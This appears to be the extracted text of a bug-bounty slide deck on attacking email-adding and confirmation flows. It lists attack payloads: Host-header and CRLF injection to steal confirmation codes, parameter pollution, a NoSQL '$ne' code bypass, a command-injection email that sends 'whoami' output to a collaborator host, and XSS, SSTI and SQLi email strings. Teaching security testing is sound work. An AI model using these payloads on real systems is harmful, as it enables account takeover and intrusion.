Adding Email
Adding Email
Adding E-mail
Adding E-mail
Mahmoud M. Awali
@0xAwali
My Methodology
attacker
Try To Change Host Header e.g. Host: me.com To Get The Confirmation Code
[email protected]&csrf=*******
My Methodology
attacker
Try To Override The Host Header e.g. POST https://company.com AND Change Host
Header e.g Host: me.com To Get The Confirmation Code
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
● Mine
POST @me.com/addEmail HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&csrf=*******
My Methodology
attacker
● Mine
POST /[email protected]# HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&csrf=*******
My Methodology
attacker
● Mine
POST /[email protected]# HTTP/1.0
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&csrf=*******
My Methodology
attacker
Try To Add Another Host Header e.g. Host: me.com To Get The Confirmation Code
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header
Too e.g. X-Forwarded-Host: me.com To Get The Confirmation Code
[email protected]&csrf=*******
My Methodology
attacker
Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header
Too e.g. X-Forwarded-Host: company.com To Get The Confirmation Code
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
[email protected]&csrf=*******
My Methodology
attacker
Try To Use CRLF and Host Header Injection e.g. ?0a%0dHost:me.com AND You
Can Use Others Headers e.g. X-Host , True-Client-IP AND X-Forwarded-Host etc
[email protected]&csrf=*******
My Methodology
attacker
● Tweet
My Methodology
attacker
[email protected]%0a%0dcc:[email protected]&
csrf=*******
My Methodology
attacker
[email protected]&[email protected]&csrf=****
***
My Methodology
attacker
Try To Use Separators e.g. | , %20 OR , To Get The Confirmation Code Too
[email protected],[email protected]&csrf=*******
My Methodology
attacker
Try To Change Content Type Header To application/json AND Insert Value Of Email As Array e.g
{"email":["[email protected]","[email protected]"]} To Get The Confirmation Code Too
{"email":
["[email protected]","[email protected]"],"csrf":"*******"}
My Methodology
attacker
Sometimes They Ping Your Host Before Sending A Mail So Try To Use Burp
Collaborator Mail Address with Injection OS Command To Get RCE
email=me@`whoami`.id.collaborator.net&csrf=*******
My Methodology
attacker
Use This List Of Payloads As Email Addresses To Get XSS , SSTI , SQLi OR
Abusing Of Database
● Tweet me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
● Tweet me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
● Tweet me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
● Video "me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
● Writeup %@gmail.com
My Methodology
attacker
Enter Correct Email AND Wrong Code Then Try To Manipulate The Response To
Change The Response To Response Of The Correct Confirmation Code To Get ETO
{
"email" : "[email protected]" ,
"code" : ******
}
My Methodology
attacker
[email protected]&code=Your-Token&csrf=*******
My Methodology
attacker
Try To Change Content Type Header To application/json AND Insert Value Of Code As Array e.g
{"code":["$ne","WrongCODE"]} To Bypass The Confirmation Code
{"email":"[email protected]","csrf":"*******","code":
{"$ne":"wrong"}]}
My Methodology
attacker
Try To Brute Force The Confirmation Code Using Multiple IPs Or Using IP Rotate
Burp Suite Extension
[email protected]&code=FUZZ&csrf=*******
My Methodology
attacker
Try To Figure Out Reaction Of The Server While Doing Race Condition By Using
Turbo Intruder OR Nuclei To Send Simultaneously Requests